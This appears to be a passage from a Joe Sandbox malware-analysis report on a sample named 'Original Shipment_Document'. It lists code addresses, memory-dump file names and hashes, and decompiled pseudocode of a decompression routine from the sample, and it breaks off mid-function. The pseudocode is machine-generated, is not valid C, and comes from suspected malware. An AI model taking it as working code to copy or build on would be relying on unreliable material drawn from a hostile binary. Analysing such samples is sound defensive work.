                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
                                                0x004073af
                                                0x004073b3
                                                0x004073b5
                                                0x004073b5
                                                0x004073b6
                                                0x004073b9
                                                0x0040738f
                                                0x0040738f
                                                0x00407397
                                                0x0040739c
                                                0x0040739e
                                                0x004073a1
                                                0x004073a1
                                                0x004073bc
                                                0x004073c3
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x004073c5
                                                0x00000000
                                                0x00407061
                                                0x00407064
                                                0x0040709a
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071ca
                                                0x004071cd
                                                0x004071cd
                                                0x004071d0
                                                0x004071d2
                                                0x0040745c
                                                0x00000000
                                                0x0040745c
                                                0x004071d8
                                                0x004071db
                                                0x00000000
                                                0x00000000
                                                0x004071e1
                                                0x004071e5
                                                0x004071e8
                                                0x004071e8
                                                0x004071e8
                                                0x00000000
                                                0x004071e8
                                                0x00407066
                                                0x00407068
                                                0x0040706a
                                                0x0040706c
                                                0x0040706f
                                                0x00407070
                                                0x00407072
                                                0x00407074
                                                0x00407077
                                                0x0040707a
                                                0x00407090
                                                0x00407095
                                                0x004070cd
                                                0x004070cd
                                                0x004070d1
                                                0x004070fd
                                                0x004070ff
                                                0x00407106
                                                0x00407109
                                                0x0040710c
                                                0x0040710c
                                                0x00407111
                                                0x00407111
                                                0x00407113
                                                0x00407116
                                                0x0040711d
                                                0x00407120
                                                0x0040714d
                                                0x0040714d
                                                0x00407150
                                                0x00407153
                                                0x004071c7
                                                0x004071c7
                                                0x004071c7
                                                0x00000000
                                                0x004071c7
                                                0x00407155
                                                0x0040715b
                                                0x0040715e
                                                0x00407161
                                                0x00407164
                                                0x00407167
                                                0x0040716a
                                                0x0040716d
                                                0x00407170
                                                0x00407173
                                                0x00407176
                                                0x0040718f
                                                0x00407191
                                                0x00407194
                                                0x00407195
                                                0x00407198
                                                0x0040719a
                                                0x0040719d
                                                0x0040719f
                                                0x004071a1
                                                0x004071a4
                                                0x004071a6
                                                0x004071a9
                                                0x004071ad
                                                0x004071af
                                                0x004071af
                                                0x004071b0
                                                0x004071b3
                                                0x004071b6
                                                0x00407178
                                                0x00407178
                                                0x00407180
                                                0x00407185
                                                0x00407187
                                                0x0040718a
                                                0x0040718a
                                                0x004071b9
                                                0x004071c0
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x0040714a
                                                0x00000000
                                                0x004071c2
                                                0x00000000
                                                0x004071c2
                                                0x004071c0
                                                0x004070d3
                                                0x004070d6
                                                0x004070d8
                                                0x004070db
                                                0x004070de
                                                0x004070e1
                                                0x004070e3
                                                0x004070e6
                                                0x004070e9
                                                0x004070e9
                                                0x004070ec
                                                0x004070ec
                                                0x004070ef
                                                0x004070f6
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x004070ca
                                                0x00000000
                                                0x004070f8
                                                0x00000000
                                                0x004070f8
                                                0x004070f6
                                                0x0040707c
                                                0x0040707f
                                                0x00407081
                                                0x00407084
                                                0x00000000
                                                0x00000000
                                                0x00406de3
                                                0x00406de3
                                                0x00406de7
                                                0x0040742c
                                                0x00000000
                                                0x0040742c
                                                0x00406ded
                                                0x00406df0
                                                0x00406df3
                                                0x00406df6
                                                0x00406df9
                                                0x00406dfc
                                                0x00406dff
                                                0x00406e01
                                                0x00406e04
                                                0x00406e07
                                                0x00406e0a
                                                0x00406e0c
                                                0x00406e0c
                                                0x00406e0c
                                                0x00000000
                                                0x00000000
                                                0x00406f6e
                                                0x00406f6e
                                                0x00406f72
                                                0x00407438
                                                0x00000000
                                                0x00407438
                                                0x00406f78
                                                0x00406f7b
                                                0x00406f7e
                                                0x00406f81
                                                0x00406f83
                                                0x00406f83
                                                0x00406f83
                                                0x00406f86
                                                0x00406f89
                                                0x00406f8c
                                                0x00406f8f
                                                0x00406f92
                                                0x00406f95
                                                0x00406f96
                                                0x00406f98
                                                0x00406f98
                                                0x00406f98
                                                0x00406f9b
                                                0x00406f9e
                                                0x00406fa1
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa4
                                                0x00406fa7
                                                0x00406fa9
                                                0x00406fa9
                                                0x00000000
                                                0x00000000
                                                0x004071eb
                                                0x004071eb
                                                0x004071eb
                                                0x004071ef
                                                0x00000000
                                                0x00000000
                                                0x004071f5
                                                0x004071f8
                                                0x004071fb
                                                0x004071fe
                                                0x00407200
                                                0x00407200
                                                0x00407200
                                                0x00407203
                                                0x00407206
                                                0x00407209
                                                0x0040720c
                                                0x0040720f
                                                0x00407212
                                                0x00407213
                                                0x00407215
                                                0x00407215
                                                0x00407215
                                                0x00407218
                                                0x0040721b
                                                0x0040721e
                                                0x00407221
                                                0x00407224
                                                0x00407228
                                                0x0040722a
                                                0x0040722d
                                                0x00000000
                                                0x0040722f
                                                0x00406fac
                                                0x00406fac
                                                0x00000000
                                                0x00406fac
                                                0x0040722d
                                                0x00407462
                                                0x00407484
                                                0x0040748a
                                                0x0040748c
                                                0x00407493
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00407499
                                                0x00407499
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                • Instruction ID: 0eb50412ba17cbd686f9e43e0b7d85c943a315db4d9133bb66c32ce13943f697
                                                • Opcode Fuzzy Hash: 44bbdf33ec7f108dda38e1aea2654f49b41f099e7fd30195a120594a7dd3ba7e
                                                • Instruction Fuzzy Hash: E7813471E04229DBDF24CFA9C8447ADBBB0FB44305F24816ED856BB281C7786A86DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406E9D Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406E9D() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004074A1))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4)); // executed
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
